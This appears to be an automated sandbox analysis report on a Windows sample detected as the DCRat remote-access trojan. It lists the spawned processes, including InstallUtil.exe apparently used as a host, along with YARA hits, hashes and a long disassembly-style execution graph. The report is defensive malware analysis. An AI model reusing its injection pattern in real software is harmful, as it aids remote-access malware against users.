                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:09:47:12
                          Start date:20/09/2023
                          Path:C:\Users\user\Desktop\a9rLzLY498.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\a9rLzLY498.exe
                          Imagebase:0x1320000
                          File size:2'114'048 bytes
                          MD5 hash:5A09955B26DE8ECDFD90121D3E208825
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:09:47:13
                          Start date:20/09/2023
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6eb1a0000
                          File size:625'664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:2
                          Start time:09:47:13
                          Start date:20/09/2023
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Imagebase:0x160000
                          File size:41'112 bytes
                          MD5 hash:AF862061889F5B9B956E9469DCDAE773
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:3
                          Start time:09:47:13
                          Start date:20/09/2023
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Imagebase:0x790000
                          File size:41'112 bytes
                          MD5 hash:AF862061889F5B9B956E9469DCDAE773
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000003.00000002.254163988.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000003.00000002.253884261.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:moderate
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:7%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:2.6%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:86
                            execution_graph 22288 1323030 22289 1323097 22288->22289 22290 1323084 22288->22290 22289->22290 22324 1330c4e 22289->22324 22292 132312e codecvt 22290->22292 22332 13257b0 22290->22332 22293 13211c0 40 API calls 22292->22293 22295 13231d0 22293->22295 22347 13240a0 22295->22347 22298 1323220 codecvt 22299 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22298->22299 22300 1323239 22299->22300 22301 132323f 22302 1330f7d std::ios_base::_Init 40 API calls 22301->22302 22304 1323244 22302->22304 22303 13232a4 22305 132334e codecvt 22303->22305 22306 13257b0 41 API calls 22303->22306 22304->22303 22307 1330c4e 41 API calls 22304->22307 22308 13211c0 40 API calls 22305->22308 22306->22305 22307->22303 22309 13233f0 22308->22309 22310 13240a0 99 API calls 22309->22310 22311 1323415 22310->22311 22312 1323440 codecvt 22311->22312 22314 132345f 22311->22314 22313 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22312->22313 22315 1323459 22313->22315 22316 1330f7d std::ios_base::_Init 40 API calls 22314->22316 22317 1323464 22316->22317 22318 13211c0 40 API calls 22317->22318 22319 1323527 22318->22319 22320 1323cb0 99 API calls 22319->22320 22321 1323541 22320->22321 22322 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22321->22322 22323 1323557 22322->22323 22325 1330c5d 22324->22325 22329 1330c74 __floor_pentium4 22324->22329 22326 133106b __dosmaperr 10 API calls 22325->22326 22327 1330c62 22326->22327 22328 1330f6d __strnicoll 40 API calls 22327->22328 22331 1330c6d __floor_pentium4 22328->22331 22330 1339550 __floor_pentium4 16 API calls 22329->22330 22329->22331 22330->22331 22331->22290 22333 1325901 22332->22333 22334 13257cf 22332->22334 22335 1321380 std::ios_base::_Init 41 API calls 22333->22335 22337 1325831 22334->22337 22338 132583e 22334->22338 22340 13257e8 22334->22340 22336 1325906 22335->22336 22339 1321300 std::ios_base::_Init 41 API calls 22336->22339 22337->22336 22337->22340 22342 1329a1a std::ios_base::_Init 3 API calls 22338->22342 22345 13257f8 _Yarn codecvt 22338->22345 22339->22345 22341 1329a1a std::ios_base::_Init 3 API calls 22340->22341 22341->22345 22342->22345 22343 1330f7d std::ios_base::_Init 40 API calls 22344 1325910 22343->22344 22345->22343 22346 13258ba _Yarn codecvt 22345->22346 22346->22292 22348 13240d3 _strcspn 22347->22348 22377 1330c0b 22348->22377 22350 1324140 _strcspn 22351 1325390 70 API calls 22350->22351 22352 1324175 22351->22352 22353 1322e70 41 API calls 22352->22353 22354 13241a1 22353->22354 22382 1325130 22354->22382 22356 13241e3 _Yarn 22357 13244e6 22356->22357 22358 1324301 22356->22358 22401 1325660 22356->22401 22420 13249b0 22357->22420 22359 132433a 22358->22359 22360 13243c9 22358->22360 22361 1324341 22359->22361 22362 1324385 22359->22362 22364 1323c20 69 API calls 22360->22364 22416 1323c20 22361->22416 22366 1323c20 69 API calls 22362->22366 22369 1324380 22364->22369 22365 13244eb 22368 1330f7d std::ios_base::_Init 40 API calls 22365->22368 22366->22369 22371 13244f0 22368->22371 22372 1323c20 69 API calls 22369->22372 22373 132441f codecvt 22372->22373 22373->22365 22374 13244c8 codecvt 22373->22374 22375 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22374->22375 22376 13231f5 22375->22376 22376->22298 22376->22301 22378 1339221 __Getctype 40 API calls 22377->22378 22379 1330c16 22378->22379 22380 1337e6e __Getctype 40 API calls 22379->22380 22381 1330c26 22380->22381 22381->22350 22383 1326610 std::_Lockit::_Lockit 3 API calls 22382->22383 22384 1325155 22383->22384 22385 1326610 std::_Lockit::_Lockit 3 API calls 22384->22385 22390 1325194 22384->22390 22387 1325173 22385->22387 22386 13251d5 22388 1326668 std::_Lockit::~_Lockit 2 API calls 22386->22388 22391 1326668 std::_Lockit::~_Lockit 2 API calls 22387->22391 22389 1325212 22388->22389 22392 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22389->22392 22390->22386 22423 1325960 22390->22423 22391->22390 22393 1325223 22392->22393 22393->22356 22396 1325227 22399 13218a0 41 API calls 22396->22399 22397 13251ef 22398 1327ebf std::_Facet_Register 3 API calls 22397->22398 22398->22386 22400 132522c 22399->22400 22402 1325797 22401->22402 22404 1325683 22401->22404 22403 1321380 std::ios_base::_Init 41 API calls 22402->22403 22414 13256ea 22403->22414 22405 1325698 22404->22405 22406 1325792 22404->22406 22409 1325704 22404->22409 22405->22406 22407 13256e4 22405->22407 22411 1321300 std::ios_base::_Init 41 API calls 22406->22411 22410 1329a1a std::ios_base::_Init 3 API calls 22407->22410 22408 1330f7d std::ios_base::_Init 40 API calls 22412 13257a1 22408->22412 22413 1329a1a std::ios_base::_Init 3 API calls 22409->22413 22409->22414 22410->22414 22411->22402 22413->22414 22414->22408 22415 1325763 codecvt 22414->22415 22415->22356 22417 1323c91 22416->22417 22418 1323c3c 22416->22418 22417->22369 22418->22417 22419 1328956 69 API calls 22418->22419 22419->22418 22489 13267b7 22420->22489 22424 1325c40 22423->22424 22425 132598e 22423->22425 22426 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22424->22426 22425->22424 22427 1329a1a std::ios_base::_Init 3 API calls 22425->22427 22428 13251e7 22426->22428 22429 132599e 22427->22429 22428->22396 22428->22397 22430 1326610 std::_Lockit::_Lockit 3 API calls 22429->22430 22431 13259d1 22430->22431 22432 1325a1b 22431->22432 22433 1325c59 22431->22433 22434 1327ff1 std::_Locinfo::_Locinfo_ctor 67 API calls 22432->22434 22435 13267d7 codecvt 41 API calls 22433->22435 22436 1325a26 22434->22436 22437 1325c63 22435->22437 22438 1330c0b 40 API calls 22436->22438 22484 132677a 22437->22484 22441 1325a38 22438->22441 22442 1329377 codecvt 40 API calls 22441->22442 22443 1325a42 22442->22443 22444 1329377 codecvt 40 API calls 22443->22444 22445 1325a93 __Getctype 22444->22445 22445->22437 22446 1325aaa 22445->22446 22470 1321b60 22446->22470 22448 1325ac4 22449 1321b60 19 API calls 22448->22449 22450 1325ade 22449->22450 22451 132645a 12 API calls 22450->22451 22452 1325b2a 22451->22452 22453 132645a 12 API calls 22452->22453 22454 1325b7f 22453->22454 22455 132803c std::_Locinfo::_Locinfo_dtor 67 API calls 22454->22455 22456 1325b9e 22455->22456 22457 1325baf 22456->22457 22458 1330c33 _Yarn 10 API calls 22456->22458 22459 1325bc8 22457->22459 22460 1330c33 _Yarn 10 API calls 22457->22460 22458->22457 22461 1325be1 22459->22461 22462 1330c33 _Yarn 10 API calls 22459->22462 22460->22459 22463 1325bfa 22461->22463 22465 1330c33 _Yarn 10 API calls 22461->22465 22462->22461 22464 1325c13 22463->22464 22466 1330c33 _Yarn 10 API calls 22463->22466 22467 1325c2c 22464->22467 22468 1330c33 _Yarn 10 API calls 22464->22468 22465->22463 22466->22464 22468->22467 22472 1321b93 22470->22472 22471 1321bd4 __Getctype 22474 1321c40 22471->22474 22483 1321bec 22471->22483 22472->22471 22473 132645a 12 API calls 22472->22473 22473->22472 22475 132677a Concurrency::cancel_current_task RaiseException 22474->22475 22477 1321c45 22475->22477 22476 1321c25 22478 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22476->22478 22488 1329161 GetStringTypeW 22477->22488 22481 1321c3c 22478->22481 22480 132645a 12 API calls 22480->22483 22481->22448 22482 1321c5d 22482->22448 22483->22476 22483->22480 22485 1326788 Concurrency::cancel_current_task 22484->22485 22486 132a8b0 Concurrency::cancel_current_task RaiseException 22485->22486 22487 1326796 22486->22487 22488->22482 22494 132670f 22489->22494 22492 132a8b0 Concurrency::cancel_current_task RaiseException 22493 13267d6 22492->22493 22495 1321200 std::invalid_argument::invalid_argument 40 API calls 22494->22495 22496 1326721 22495->22496 22496->22492 20376 132773b 20377 1327773 20376->20377 20378 1327744 20376->20378 20378->20377 20381 133159e 20378->20381 20380 1327766 20382 13315b0 20381->20382 20386 13315b9 ___scrt_uninitialize_crt 20381->20386 20383 1331422 ___scrt_uninitialize_crt 69 API calls 20382->20383 20384 13315b6 20383->20384 20384->20380 20385 13315ca 20385->20380 20386->20385 20389 13313c2 20386->20389 20390 13313ce ___scrt_is_nonwritable_in_current_image 20389->20390 20397 132e2f8 EnterCriticalSection 20390->20397 20392 13313dc 20393 1331530 ___scrt_uninitialize_crt 69 API calls 20392->20393 20394 13313ed 20393->20394 20398 1331416 20394->20398 20397->20392 20401 132e30c LeaveCriticalSection 20398->20401 20400 13313ff 20400->20380 20401->20400 20021 1323c20 20022 1323c91 20021->20022 20023 1323c3c 20021->20023 20023->20022 20024 1328956 69 API calls 20023->20024 20024->20023 22663 1328421 22666 132833a 22663->22666 22665 132842c codecvt 22667 132836b 22666->22667 22668 132837d 22667->22668 22670 1328664 22667->22670 22668->22665 22671 132866e 22670->22671 22672 132868b 22670->22672 22673 13284ad 68 API calls 22671->22673 22672->22668 22674 132867a 22673->22674 22676 133125a 22674->22676 22677 133126d _Fputc 22676->22677 22682 1331135 22677->22682 22679 1331279 22680 132f150 _Fputc 40 API calls 22679->22680 22681 1331285 22680->22681 22681->22672 22683 1331141 ___scrt_is_nonwritable_in_current_image 22682->22683 22684 133114b 22683->22684 22685 133116e 22683->22685 22686 1330ef0 _Fputc 40 API calls 22684->22686 22687 1331166 22685->22687 22693 132e2f8 EnterCriticalSection 22685->22693 22686->22687 22687->22679 22689 133118c 22694 13311cc 22689->22694 22691 1331199 22708 13311c4 22691->22708 22693->22689 22695 13311d9 22694->22695 22696 13311fc 22694->22696 22697 1330ef0 _Fputc 40 API calls 22695->22697 22698 13314c7 ___scrt_uninitialize_crt 65 API calls 22696->22698 22699 13311f4 22696->22699 22697->22699 22700 1331214 22698->22700 22699->22691 22711 1337bee 22700->22711 22703 1338d82 _Ungetc 40 API calls 22704 1331228 22703->22704 22715 1339f91 22704->22715 22707 133737f ___free_lconv_mon 10 API calls 22707->22699 22757 132e30c LeaveCriticalSection 22708->22757 22710 13311ca 22710->22687 22712 1337c05 22711->22712 22713 133121c 22711->22713 22712->22713 22714 133737f ___free_lconv_mon 10 API calls 22712->22714 22713->22703 22714->22713 22716 133122f 22715->22716 22717 1339fba 22715->22717 22716->22699 22716->22707 22718 133a009 22717->22718 22720 1339fe1 22717->22720 22719 1330ef0 _Fputc 40 API calls 22718->22719 22719->22716 22722 1339f00 22720->22722 22723 1339f0c ___scrt_is_nonwritable_in_current_image 22722->22723 22730 1340634 EnterCriticalSection 22723->22730 22725 1339f1a 22728 1339f4b 22725->22728 22731 133a034 22725->22731 22744 1339f85 22728->22744 22730->22725 22732 134070b ___scrt_uninitialize_crt 40 API calls 22731->22732 22735 133a044 22732->22735 22733 133a04a 22747 134067a 22733->22747 22734 133a07c 22734->22733 22738 134070b ___scrt_uninitialize_crt 40 API calls 22734->22738 22735->22733 22735->22734 22737 134070b ___scrt_uninitialize_crt 40 API calls 22735->22737 22739 133a073 22737->22739 22740 133a088 CloseHandle 22738->22740 22741 134070b ___scrt_uninitialize_crt 40 API calls 22739->22741 22740->22733 22742 133a094 GetLastError 22740->22742 22741->22734 22742->22733 22743 133a0a2 ___scrt_uninitialize_crt 22743->22728 22756 1340657 LeaveCriticalSection 22744->22756 22746 1339f6e 22746->22716 22748 13406f0 22747->22748 22749 1340689 22747->22749 22750 133106b __dosmaperr 10 API calls 22748->22750 22749->22748 22755 13406b3 22749->22755 22751 13406f5 22750->22751 22752 1331058 __dosmaperr 10 API calls 22751->22752 22753 13406e0 22752->22753 22753->22743 22754 13406da SetStdHandle 22754->22753 22755->22753 22755->22754 22756->22746 22757->22710 20345 1329b2e 20350 132a6b7 SetUnhandledExceptionFilter 20345->20350 20347 1329b33 20351 133667a 20347->20351 20349 1329b3e 20350->20347 20352 13366a0 20351->20352 20353 1336686 20351->20353 20352->20349 20353->20352 20354 133106b __dosmaperr 10 API calls 20353->20354 20355 1336690 20354->20355 20356 1330f6d __strnicoll 40 API calls 20355->20356 20357 133669b 20356->20357 20357->20349 20854 1335313 20857 1334fdf 20854->20857 20858 1334feb ___scrt_is_nonwritable_in_current_image 20857->20858 20865 13310bf EnterCriticalSection 20858->20865 20860 1335023 20866 1335041 20860->20866 20862 1334ff5 20862->20860 20864 13417a2 __Getctype 10 API calls 20862->20864 20864->20862 20865->20862 20869 1331107 LeaveCriticalSection 20866->20869 20868 133502f 20869->20868 20025 1321016 20030 13269fc 20025->20030 20027 1321029 20034 1329f08 20027->20034 20031 1326a08 __EH_prolog3 20030->20031 20037 1327341 20031->20037 20033 1326a64 std::ios_base::_Init 20033->20027 20218 1329edb 20034->20218 20046 132704c 20037->20046 20039 132734c 20054 132798f 20039->20054 20041 132735f 20042 1327378 20041->20042 20043 13220c0 std::ios_base::_Init 41 API calls 20041->20043 20044 1327384 20042->20044 20058 13295f5 20042->20058 20043->20042 20044->20033 20047 1327058 __EH_prolog3 20046->20047 20048 13220c0 std::ios_base::_Init 41 API calls 20047->20048 20049 1327089 20048->20049 20050 1329a1a std::ios_base::_Init 3 API calls 20049->20050 20051 1327090 20050->20051 20053 13270a1 std::ios_base::_Init 20051->20053 20063 1327ef1 20051->20063 20053->20039 20055 132799b __EH_prolog3 20054->20055 20149 1326967 20055->20149 20057 13279b3 std::ios_base::_Ios_base_dtor std::ios_base::_Init 20057->20041 20059 1326610 std::_Lockit::_Lockit 3 API calls 20058->20059 20060 1329605 20059->20060 20061 1326668 std::_Lockit::~_Lockit 2 API calls 20060->20061 20062 1329643 20061->20062 20062->20044 20064 1327efd __EH_prolog3 20063->20064 20065 1326610 std::_Lockit::_Lockit 3 API calls 20064->20065 20066 1327f08 20065->20066 20067 1327f39 20066->20067 20075 1328056 20066->20075 20069 1326668 std::_Lockit::~_Lockit 2 API calls 20067->20069 20072 1327f79 std::ios_base::_Init 20069->20072 20070 1327f1b 20081 1328079 20070->20081 20072->20053 20074 1327e49 _Yarn 10 API calls 20074->20067 20076 1329a1a std::ios_base::_Init 3 API calls 20075->20076 20077 1328061 20076->20077 20078 1328075 20077->20078 20085 1327d85 20077->20085 20078->20070 20082 1327f23 20081->20082 20083 1328085 20081->20083 20082->20074 20088 132979d 20083->20088 20086 1327e49 _Yarn 10 API calls 20085->20086 20087 1327dbf 20086->20087 20087->20070 20089 13335e1 20088->20089 20090 13297ad EncodePointer 20088->20090 20101 133d56e 20089->20101 20090->20082 20090->20089 20093 13335f1 20095 13335fb IsProcessorFeaturePresent 20093->20095 20100 133361a 20093->20100 20096 1333607 20095->20096 20098 1330d71 __CreateFrameInfo 8 API calls 20096->20098 20097 1334e96 __CreateFrameInfo 20 API calls 20099 1333624 20097->20099 20098->20100 20100->20097 20131 133d4a0 20101->20131 20104 133d5b3 20105 133d5bf ___scrt_is_nonwritable_in_current_image 20104->20105 20106 1339372 __dosmaperr 10 API calls 20105->20106 20110 133d5ec __CreateFrameInfo 20105->20110 20113 133d5e6 __CreateFrameInfo 20105->20113 20106->20113 20107 133d633 20109 133106b __dosmaperr 10 API calls 20107->20109 20108 133d61d 20108->20093 20111 133d638 20109->20111 20112 133d65f 20110->20112 20142 13310bf EnterCriticalSection 20110->20142 20114 1330f6d __strnicoll 40 API calls 20111->20114 20117 133d792 20112->20117 20120 133d6a1 20112->20120 20128 133d6d0 20112->20128 20113->20107 20113->20108 20113->20110 20114->20108 20121 133d79d 20117->20121 20147 1331107 LeaveCriticalSection 20117->20147 20119 1334e96 __CreateFrameInfo 20 API calls 20122 133d7a5 20119->20122 20124 1339221 __Getctype 40 API calls 20120->20124 20120->20128 20121->20119 20125 133d6c5 20124->20125 20127 1339221 __Getctype 40 API calls 20125->20127 20126 1339221 __Getctype 40 API calls 20129 133d725 20126->20129 20127->20128 20143 133d73f 20128->20143 20129->20108 20130 1339221 __Getctype 40 API calls 20129->20130 20130->20108 20132 133d4ac ___scrt_is_nonwritable_in_current_image 20131->20132 20137 13310bf EnterCriticalSection 20132->20137 20134 133d4ba 20138 133d4f8 20134->20138 20137->20134 20141 1331107 LeaveCriticalSection 20138->20141 20140 13335e6 20140->20093 20140->20104 20141->20140 20142->20112 20144 133d745 20143->20144 20145 133d716 20143->20145 20148 1331107 LeaveCriticalSection 20144->20148 20145->20108 20145->20126 20145->20129 20147->20121 20148->20145 20150 1326973 __EH_prolog3 20149->20150 20151 1326610 std::_Lockit::_Lockit 3 API calls 20150->20151 20152 132697d 20151->20152 20167 1321a30 20152->20167 20154 1326994 20163 13269a7 20154->20163 20175 1326f2c 20154->20175 20155 1326668 std::_Lockit::~_Lockit 2 API calls 20156 13269ee std::ios_base::_Init 20155->20156 20156->20057 20158 13269b7 20159 13269f6 20158->20159 20160 13269be 20158->20160 20185 13218a0 20159->20185 20162 1327ebf std::_Facet_Register 3 API calls 20160->20162 20162->20163 20163->20155 20164 13269fb __EH_prolog3 20165 1327341 72 API calls 20164->20165 20166 1326a64 std::ios_base::_Init 20165->20166 20166->20057 20168 1321a46 20167->20168 20169 1321a6e 20167->20169 20170 1326610 std::_Lockit::_Lockit 3 API calls 20168->20170 20171 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20169->20171 20172 1321a51 20170->20172 20173 1321a7c 20171->20173 20174 1326668 std::_Lockit::~_Lockit 2 API calls 20172->20174 20173->20154 20174->20169 20177 1326f38 __EH_prolog3 20175->20177 20176 1326f89 std::ios_base::_Init 20176->20158 20177->20176 20178 1329a1a std::ios_base::_Init 3 API calls 20177->20178 20179 1326f51 codecvt 20178->20179 20180 1326f78 20179->20180 20191 1321920 20179->20191 20180->20176 20203 1321990 20180->20203 20186 13218ab 20185->20186 20187 132a8b0 Concurrency::cancel_current_task RaiseException 20186->20187 20188 13218ba 20187->20188 20189 132a80b ___std_exception_copy 40 API calls 20188->20189 20190 13218e1 20189->20190 20190->20164 20192 1326610 std::_Lockit::_Lockit 3 API calls 20191->20192 20193 132192a 20192->20193 20194 1321978 20193->20194 20195 1321968 20193->20195 20197 13267d7 codecvt 41 API calls 20194->20197 20196 1327ff1 std::_Locinfo::_Locinfo_ctor 67 API calls 20195->20196 20199 132196f 20196->20199 20198 1321982 20197->20198 20200 1326aba 20199->20200 20201 1329200 __Getctype 40 API calls 20200->20201 20202 1326add 20201->20202 20202->20180 20204 132803c std::_Locinfo::_Locinfo_dtor 67 API calls 20203->20204 20205 1321999 20204->20205 20206 13219a9 20205->20206 20208 1330c33 _Yarn 10 API calls 20205->20208 20207 13219c0 20206->20207 20209 1330c33 _Yarn 10 API calls 20206->20209 20210 1330c33 _Yarn 10 API calls 20207->20210 20212 13219d7 20207->20212 20208->20206 20209->20207 20210->20212 20211 13219ee 20214 1321a05 20211->20214 20216 1330c33 _Yarn 10 API calls 20211->20216 20212->20211 20213 1330c33 _Yarn 10 API calls 20212->20213 20213->20211 20215 1321a1c 20214->20215 20217 1330c33 _Yarn 10 API calls 20214->20217 20216->20214 20217->20215 20219 1329ef1 20218->20219 20220 1329eea 20218->20220 20227 13369be 20219->20227 20224 1336941 20220->20224 20223 1321033 20225 13369be 43 API calls 20224->20225 20226 1336953 20225->20226 20226->20223 20230 133670a 20227->20230 20231 1336716 ___scrt_is_nonwritable_in_current_image 20230->20231 20238 13310bf EnterCriticalSection 20231->20238 20233 1336724 20239 1336765 20233->20239 20235 1336731 20249 1336759 20235->20249 20238->20233 20240 1336780 20239->20240 20248 13367f3 std::_Lockit::_Lockit 20239->20248 20241 13367d3 20240->20241 20240->20248 20252 1342a47 20240->20252 20243 1342a47 43 API calls 20241->20243 20241->20248 20245 13367e9 20243->20245 20244 13367c9 20246 133737f ___free_lconv_mon 10 API calls 20244->20246 20247 133737f ___free_lconv_mon 10 API calls 20245->20247 20246->20241 20247->20248 20248->20235 20280 1331107 LeaveCriticalSection 20249->20280 20251 1336742 20251->20223 20253 1342a54 20252->20253 20254 1342a6f 20252->20254 20253->20254 20255 1342a60 20253->20255 20256 1342a7e 20254->20256 20261 134609f 20254->20261 20257 133106b __dosmaperr 10 API calls 20255->20257 20268 133d84a 20256->20268 20260 1342a65 codecvt 20257->20260 20260->20244 20262 13460bf HeapSize 20261->20262 20263 13460aa 20261->20263 20262->20256 20264 133106b __dosmaperr 10 API calls 20263->20264 20265 13460af 20264->20265 20266 1330f6d __strnicoll 40 API calls 20265->20266 20267 13460ba 20266->20267 20267->20256 20269 133d862 20268->20269 20270 133d857 20268->20270 20272 133d86a 20269->20272 20278 133d873 __Getctype 20269->20278 20271 1337e20 __strnicoll 11 API calls 20270->20271 20276 133d85f 20271->20276 20273 133737f ___free_lconv_mon 10 API calls 20272->20273 20273->20276 20274 133d878 20277 133106b __dosmaperr 10 API calls 20274->20277 20275 133d89d HeapReAlloc 20275->20276 20275->20278 20276->20260 20277->20276 20278->20274 20278->20275 20279 13342ee std::ios_base::_Init 2 API calls 20278->20279 20279->20278 20280->20251 21106 1328b00 21108 1328b14 21106->21108 21107 1328b6f 21108->21107 21114 13284ad 21108->21114 21111 1328b5c 21111->21107 21126 1331746 21111->21126 21115 1328519 21114->21115 21118 13284c8 21114->21118 21116 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21115->21116 21117 1328531 21116->21117 21117->21107 21117->21111 21120 1331f66 21117->21120 21118->21115 21119 1332268 68 API calls 21118->21119 21119->21115 21121 1331f79 _Fputc 21120->21121 21140 1331d05 21121->21140 21124 132f150 _Fputc 40 API calls 21125 1331f9b 21124->21125 21125->21111 21127 1331751 21126->21127 21128 1331766 21126->21128 21129 133106b __dosmaperr 10 API calls 21127->21129 21130 1331783 21128->21130 21131 133176e 21128->21131 21133 1331756 21129->21133 21178 133b643 21130->21178 21134 133106b __dosmaperr 10 API calls 21131->21134 21136 1330f6d __strnicoll 40 API calls 21133->21136 21135 1331773 21134->21135 21137 1330f6d __strnicoll 40 API calls 21135->21137 21138 1331761 21136->21138 21139 133177e 21137->21139 21138->21107 21139->21107 21142 1331d11 ___scrt_is_nonwritable_in_current_image 21140->21142 21141 1331d17 21144 1330ef0 _Fputc 40 API calls 21141->21144 21142->21141 21143 1331d4b 21142->21143 21151 132e2f8 EnterCriticalSection 21143->21151 21147 1331d32 21144->21147 21146 1331d57 21152 1331e7a 21146->21152 21147->21124 21149 1331d6e 21161 1331d97 21149->21161 21151->21146 21153 1331ea0 21152->21153 21154 1331e8d 21152->21154 21164 1331da1 21153->21164 21154->21149 21156 1331ec3 21157 13314c7 ___scrt_uninitialize_crt 65 API calls 21156->21157 21160 1331f51 21156->21160 21158 1331ef1 21157->21158 21168 133c675 21158->21168 21160->21149 21177 132e30c LeaveCriticalSection 21161->21177 21163 1331d9f 21163->21147 21165 1331db2 21164->21165 21166 1331e0a 21164->21166 21165->21166 21171 133c635 21165->21171 21166->21156 21169 133c554 ___scrt_uninitialize_crt 42 API calls 21168->21169 21170 133c68e 21169->21170 21170->21160 21172 133c649 _Fputc 21171->21172 21173 133c554 ___scrt_uninitialize_crt 42 API calls 21172->21173 21174 133c65e 21173->21174 21175 132f150 _Fputc 40 API calls 21174->21175 21176 133c66d 21175->21176 21176->21166 21177->21163 21179 133b657 _Fputc 21178->21179 21184 133b058 21179->21184 21182 132f150 _Fputc 40 API calls 21183 133b671 21182->21183 21183->21139 21185 133b064 ___scrt_is_nonwritable_in_current_image 21184->21185 21186 133b06b 21185->21186 21187 133b08e 21185->21187 21188 1330ef0 _Fputc 40 API calls 21186->21188 21195 132e2f8 EnterCriticalSection 21187->21195 21190 133b084 21188->21190 21190->21182 21191 133b09c 21196 133b0e7 21191->21196 21193 133b0ab 21209 133b0dd 21193->21209 21195->21191 21197 133b0f6 21196->21197 21198 133b11e 21196->21198 21199 1330ef0 _Fputc 40 API calls 21197->21199 21200 1338d82 _Ungetc 40 API calls 21198->21200 21208 133b111 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21199->21208 21201 133b127 21200->21201 21212 133c617 21201->21212 21204 133b1d1 21215 133b447 21204->21215 21206 133b1e8 21206->21208 21227 133b288 21206->21227 21208->21193 21234 132e30c LeaveCriticalSection 21209->21234 21211 133b0e5 21211->21190 21213 133c42e 44 API calls 21212->21213 21214 133b145 21213->21214 21214->21204 21214->21206 21214->21208 21216 133b456 ___scrt_uninitialize_crt 21215->21216 21217 1338d82 _Ungetc 40 API calls 21216->21217 21219 133b472 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21217->21219 21218 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21220 133b5f0 21218->21220 21221 133c617 44 API calls 21219->21221 21226 133b47e 21219->21226 21220->21208 21222 133b4d2 21221->21222 21223 133b504 ReadFile 21222->21223 21222->21226 21224 133b52b 21223->21224 21223->21226 21225 133c617 44 API calls 21224->21225 21225->21226 21226->21218 21228 1338d82 _Ungetc 40 API calls 21227->21228 21229 133b29b 21228->21229 21230 133c617 44 API calls 21229->21230 21233 133b2e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21229->21233 21231 133b336 21230->21231 21232 133c617 44 API calls 21231->21232 21231->21233 21232->21233 21233->21208 21234->21211 22803 133ae73 22804 133ae82 22803->22804 22808 133ae97 22803->22808 22805 133106b __dosmaperr 10 API calls 22804->22805 22806 133ae87 22805->22806 22807 1330f6d __strnicoll 40 API calls 22806->22807 22817 133ae92 22807->22817 22809 133aef5 22808->22809 22810 133c693 _Ungetc 10 API calls 22808->22810 22808->22817 22811 1338d82 _Ungetc 40 API calls 22809->22811 22810->22809 22812 133af25 22811->22812 22823 133bf7b 22812->22823 22815 1338d82 _Ungetc 40 API calls 22816 133af67 22815->22816 22816->22817 22818 1338d82 _Ungetc 40 API calls 22816->22818 22819 133af75 22818->22819 22819->22817 22820 1338d82 _Ungetc 40 API calls 22819->22820 22821 133af83 22820->22821 22822 1338d82 _Ungetc 40 API calls 22821->22822 22822->22817 22824 133bf87 